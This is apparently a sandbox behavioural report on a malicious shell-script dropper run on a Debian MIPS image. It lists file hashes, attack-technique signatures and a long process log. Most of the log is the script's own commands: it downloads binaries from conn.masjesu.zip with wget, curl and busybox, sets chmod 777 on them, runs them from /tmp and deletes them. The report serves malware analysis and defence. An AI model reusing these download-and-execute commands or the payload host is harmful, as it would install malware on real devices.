Analysis
-
max time kernel
68s -
max time network
96s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mips image:debian9-mipsbe-20240418-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
01-11-2024 03:00
Static task
static1
Behavioral task
behavioral1
Sample
344f97c18ebaa86ae678af8d31b5f037fb1390672970c506cfa5641e35b4a07b.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
344f97c18ebaa86ae678af8d31b5f037fb1390672970c506cfa5641e35b4a07b.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
344f97c18ebaa86ae678af8d31b5f037fb1390672970c506cfa5641e35b4a07b.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
344f97c18ebaa86ae678af8d31b5f037fb1390672970c506cfa5641e35b4a07b.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
344f97c18ebaa86ae678af8d31b5f037fb1390672970c506cfa5641e35b4a07b.sh
-
Size
10KB
-
MD5
6fbfa1ebffef931402c957837d1ce7a3
-
SHA1
bff64ab4bb8667d6e4b480a6546aebf51b70e058
-
SHA256
344f97c18ebaa86ae678af8d31b5f037fb1390672970c506cfa5641e35b4a07b
-
SHA512
9d57a72ac5df656dca09cb391f0b533d9eb0a6c9a3a8b248805bd866dd31a00ef232144454417faf737e187432c59a2996cefbe856be787dd050ef1b70b75fe7
-
SSDEEP
96:YyK1mumemELvNLsxsLASq7Nb3eUyK1lFHgLi6gLgfgzgbytMKLZxrKCQp9p9pchl:K/WwKg8RYJaJ7
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
description ioc Process
File opened for reading /proc/sys/crypto/fips_enabled curl
-
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/344f97c18ebaa86ae678af8d31b5f037fb1390672970c506cfa5641e35b4a07b.sh/tmp/344f97c18ebaa86ae678af8d31b5f037fb1390672970c506cfa5641e35b4a07b.sh1⤵PID:714
-
/bin/rm/bin/rm bins.sh2⤵PID:720
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵
- System Network Configuration Discovery
PID:726
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:731
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵PID:740
-
-
/bin/chmodchmod 777 rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m./rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵PID:743
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵PID:744
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵
- System Network Configuration Discovery
PID:747
-
-
/bin/chmodchmod 777 yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s./yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵PID:751
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵PID:752
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:753
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵PID:760
-
-
/bin/chmodchmod 777 jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵
- File and Directory Permissions Modification
PID:765
-
-
/tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4./jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵
- Executes dropped EXE
PID:767
-
-
/bin/rmrm jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵PID:769
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵
- System Network Configuration Discovery
PID:770
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:776
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵
- System Network Configuration Discovery
PID:782
-
-
/bin/chmodchmod 777 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵
- File and Directory Permissions Modification
PID:785
-
-
/tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys./6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵
- Executes dropped EXE
PID:787
-
-
/bin/rmrm 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵PID:789
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵
- System Network Configuration Discovery
PID:791
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:826
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵
- System Network Configuration Discovery
PID:836
-
-
/bin/chmodchmod 777 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵
- File and Directory Permissions Modification
PID:840
-
-
/tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh./5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵
- Executes dropped EXE
PID:841
-
-
/bin/rmrm 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵PID:844
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵
- System Network Configuration Discovery
PID:845
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:851
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵
- System Network Configuration Discovery
PID:853
-
-
/bin/chmodchmod 777 kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵
- File and Directory Permissions Modification
PID:857
-
-
/tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7./kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵
- Executes dropped EXE
PID:858
-
-
/bin/rmrm kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵PID:860
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵
- System Network Configuration Discovery
PID:861
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:862
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵PID:864
-
-
/bin/chmodchmod 777 NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK./NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵
- Executes dropped EXE
PID:866
-
-
/bin/rmrm NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵PID:867
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵PID:868
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵
- System Network Configuration Discovery
PID:871
-
-
/bin/chmodchmod 777 oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do./oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵PID:875
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵
- System Network Configuration Discovery
PID:876
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵
- System Network Configuration Discovery
PID:879
-
-
/bin/chmodchmod 777 rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT./rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵PID:883
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵
- System Network Configuration Discovery
PID:884
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵
- System Network Configuration Discovery
PID:887
-
-
/bin/chmodchmod 777 I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵
- File and Directory Permissions Modification
PID:888
-
-
/tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq./I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵
- Executes dropped EXE
PID:889
-
-
/bin/rmrm I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵PID:890
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵
- System Network Configuration Discovery
PID:891
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:892
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵
- System Network Configuration Discovery
PID:894
-
-
/bin/chmodchmod 777 A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH./A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵PID:898
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵
- System Network Configuration Discovery
PID:899
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵
- System Network Configuration Discovery
PID:902
-
-
/bin/chmodchmod 777 SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb./SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵PID:906
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵PID:907
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵
- System Network Configuration Discovery
PID:910
-
-
/bin/chmodchmod 777 WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV./WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵PID:913
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵
- System Network Configuration Discovery
PID:914
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵PID:917
-
-
/bin/chmodchmod 777 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵
- File and Directory Permissions Modification
PID:918
-
-
/tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA./8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵
- Executes dropped EXE
PID:919
-
-
/bin/rmrm 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵PID:920
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵
- System Network Configuration Discovery
PID:921
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:922
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵
- System Network Configuration Discovery
PID:924
-
-
/bin/chmodchmod 777 rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m./rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵PID:928
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵
- System Network Configuration Discovery
PID:929
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵
- System Network Configuration Discovery
PID:932
-
-
/bin/chmodchmod 777 yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s./yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵PID:936
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵
- System Network Configuration Discovery
PID:937
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵
- System Network Configuration Discovery
PID:940
-
-
/bin/chmodchmod 777 jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4./jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵PID:944
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵
- System Network Configuration Discovery
PID:945
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:946
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵
- System Network Configuration Discovery
PID:948
-
-
/bin/chmodchmod 777 kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7./kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵PID:951
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵PID:952
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵PID:955
-
-
/bin/chmodchmod 777 NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵
- File and Directory Permissions Modification
PID:956
-
-
/tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK./NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵
- Executes dropped EXE
PID:957
-
-
/bin/rmrm NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵PID:959
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵
- System Network Configuration Discovery
PID:960
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵
- System Network Configuration Discovery
PID:963
-
-
/bin/chmodchmod 777 oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵
- File and Directory Permissions Modification
PID:964
-
-
/tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do./oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵
- Executes dropped EXE
PID:965
-
-
/bin/rmrm oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵PID:967
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵
- System Network Configuration Discovery
PID:968
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵
- System Network Configuration Discovery
PID:971
-
-
/bin/chmodchmod 777 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵
- File and Directory Permissions Modification
PID:972
-
-
/tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys./6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵
- Executes dropped EXE
PID:973
-
-
/bin/rmrm 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵PID:974
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵
- System Network Configuration Discovery
PID:975
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:976
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵
- System Network Configuration Discovery
PID:978
-
-
/bin/chmodchmod 777 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵
- File and Directory Permissions Modification
PID:979
-
-
/tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh./5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵
- Executes dropped EXE
PID:980
-
-
/bin/rmrm 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵PID:982
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵
- System Network Configuration Discovery
PID:983
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:984
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵
- System Network Configuration Discovery
PID:986
-
-
/bin/chmodchmod 777 rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵
- File and Directory Permissions Modification
PID:987
-
-
/tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT./rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵
- Executes dropped EXE
PID:988
-
-
/bin/rmrm rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵PID:990
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵
- System Network Configuration Discovery
PID:991
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:992
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵PID:994
-
-
/bin/chmodchmod 777 SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵
- File and Directory Permissions Modification
PID:995
-
-
/tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb./SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵
- Executes dropped EXE
PID:996
-
-
/bin/rmrm SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵PID:997
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵
- System Network Configuration Discovery
PID:998
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:999
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵
- System Network Configuration Discovery
PID:1001
-
-
/bin/chmodchmod 777 WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵
- File and Directory Permissions Modification
PID:1002
-
-
/tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV./WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵
- Executes dropped EXE
PID:1003
-
-
/bin/rmrm WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵PID:1004
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵PID:1005
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1006
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵
- System Network Configuration Discovery
PID:1008
-
-
/bin/chmodchmod 777 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵
- File and Directory Permissions Modification
PID:1009
-
-
/tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA./8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵
- Executes dropped EXE
PID:1010
-
-
/bin/rmrm 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵PID:1011
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵
- System Network Configuration Discovery
PID:1012
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1013
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵
- System Network Configuration Discovery
PID:1015
-
-
/bin/chmodchmod 777 I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵
- File and Directory Permissions Modification
PID:1016
-
-
/tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq./I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵
- Executes dropped EXE
PID:1017
-
-
/bin/rmrm I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵PID:1018
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵
- System Network Configuration Discovery
PID:1019
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1020
-
-
